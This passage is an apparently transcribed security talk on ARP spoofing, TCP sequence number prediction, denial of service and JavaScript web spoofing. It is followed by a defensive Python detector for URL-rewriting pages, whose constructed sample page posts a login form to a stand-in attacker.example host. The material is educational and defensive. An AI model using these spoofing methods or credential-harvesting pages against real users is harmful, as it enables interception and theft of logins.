packet is sent out on the ethernet he needs to figure out the hardware address of the machine to write to now there are programs and there are ways I'm not really an expert that to that level but there are ways in which I can when an ARP request is sent out the response that comes back directs the packet to come to my machine now if I am smart what I will do is I will make sure my machine becomes a man in the middle kind of thing so I will relay stuff so for all practical purposes A is talking to B you are doing stuff but everything is going through my machine simply because I have been able to ARP spoof that particular connection anything else? yeah okay there are really again that's getting to be more and more difficult but there are many ways of doing it normally though it was well accepted that the stack when machines actually came up they kind of started with one right in the beginning and every second the counter got incremented by 128,000 for every connect you got an increment of 64,000 now really what happens is when you are trying to predict sequence numbers you would try and make legitimate connections to a machine multiple connections so you kind of compute three four things one is you get to see what the ISN is the initial sequence number you kind of log that when you find three or four connections you get to see how the increment is happening then you also figure out how much time it's taking your packet back the round trip time so you need to know roughly how much time it takes to reach there because with every packet reaching your counter is going up by 64k okay based on these kind of things you initiate a connection and hopefully someone else has not gotten before that where you can predict the sequence number okay these are getting more and more difficult because logically the next steps were to randomize the way sequence numbers were happening so if you run nmap for example which is a port scanner and OS detector on a lot of machines it comes back 
saying listen I've detected windows here and it's trivial your sequence number prediction is trivial or if it's linux it says bad stuff good luck to you friend you know things like that it's yeah I don't think so I don't think so I mean let's look at it if the packet never reaches you okay you don't know that you are being denied information or requests that are coming to you sure you might notice that my web traffic has gone down okay but there could be multiple reasons for that I mean for example if I did a denial of service attack against a particular site let's assume there's an ISP who's got lots of clients over there you're targeting one particular client simply because you are creating so much of network saturation and you're making life miserable for all his clients what will the ISP do he'll simply filter out any packet that's coming to the target site in effect what has he done he's helped the attacker I mean he's done what the attacker was trying to do much more effectively he just pulled the plug on that guy okay so it's yeah sorry yes please frankly I haven't used commercial firewalls most of my work is with packet filtering on linux so I really am not the right person to give you information on that sorry yeah sure it would I'm sure but it's like saying you're taking corrective action after the event has taken place after something's happened at that point of time the amount of loss that has taken place and the amount of negative that has happened is something which you probably can't reverse isn't it sure now we are getting into business policies again which would vary in different parts of the world all my my premise is I've gone and deleted all the information on your server doesn't help yeah I'll give you my last just in case anybody needs to write to me okay that's my email address in case somebody needs to write and ask I'd be happy to yeah sorry 1997 is when the report came out and they said at that point of time it affected both microsoft 
internet explorer as well as Netscape I'm not sure of current status the idea of sorry no they actually said we have a working model which we've demonstrated but we're not going to release it to the web but it was pure javascript they actually replaced the real menu with their own so when you clicked on it internally the intelligence was built into actually get the real page and show it to you yes yes yes yes okay thanks I'll stop here
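A defender-side check for the contextual cues the talk says a URL-rewriting man-in-the-middle page has to hide: links that route through one foreign host with the real site's URL embedded in the path, JavaScript that writes the status line, and JavaScript that replaces the location line. This is an added editor's example, not code from the talk or from the Princeton report; the attacker.example host and the sample page are constructed, and the patterns are string heuristics rather than a JavaScript parser.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit
# Heuristic patterns for the two JavaScript tricks the talk describes; not a JS parser.
STATUS_LINE_WRITE = re.compile(r"window\.status\s*=")
LOCATION_OVERRIDE = re.compile(r"(?:window\.|document\.)?location(?:\.href)?\s*=")
class PageScanner(HTMLParser):
    """Collects <a>/<form> targets, inline <script> bodies and on* event handlers."""
    def __init__(self):
        super().__init__()
        self.targets, self.scripts, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("a", "form"):
            target = attrs.get("href" if tag == "a" else "action")
            if target:
                self.targets.append(target)
        # onmouseover="window.status=..." lives in attributes, not in <script>
        self.scripts.extend(v for k, v in attrs.items() if k.startswith("on") and v)
        self._in_script = tag == "script"
    def handle_endtag(self, tag):
        if tag == "script": self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)
def rewritten_links(targets, expected_host):
    """Links off expected_host that embed another site's URL in their path, the
    'www.attacker.org/www.hotmail.com/...' shape produced by a rewriting proxy."""
    hits = []
    for t in targets:
        parts = urlsplit(t)
        if parts.netloc and parts.netloc.lower() != expected_host.lower():
            tail = parts.path + "?" + parts.query
            if re.search(r"(https?://|www\.[a-z0-9.-]+\.[a-z]{2,})", tail, re.I):
                hits.append(t)
    return hits
def find_spoofing_indicators(html, expected_host):
    """Report the contextual cues the talk says the attacker must hide."""
    scanner = PageScanner()
    scanner.feed(html)
    js = "\n".join(scanner.scripts)
    return {"rewritten_links": rewritten_links(scanner.targets, expected_host),
            "status_line_write": bool(STATUS_LINE_WRITE.search(js)),
            "location_override": bool(LOCATION_OVERRIDE.search(js))}
# Constructed sample page (hypothetical attacker.example host), not a real capture.
SAMPLE_PAGE = """<a href="http://www.attacker.example/www.hotmail.com/inbox"
 onmouseover="window.status='http://www.hotmail.com/inbox'; return true">Inbox</a>
<form action="http://www.attacker.example/https://www.hotmail.com/login"></form>
<script>window.status = 'Connected to www.hotmail.com';</script>"""
```

Run `find_spoofing_indicators(SAMPLE_PAGE, "www.hotmail.com")` to see both the rewritten link and form action flagged along with the status-line write; the view-source menu replacement the talk describes is browser UI and cannot be detected from the page alone.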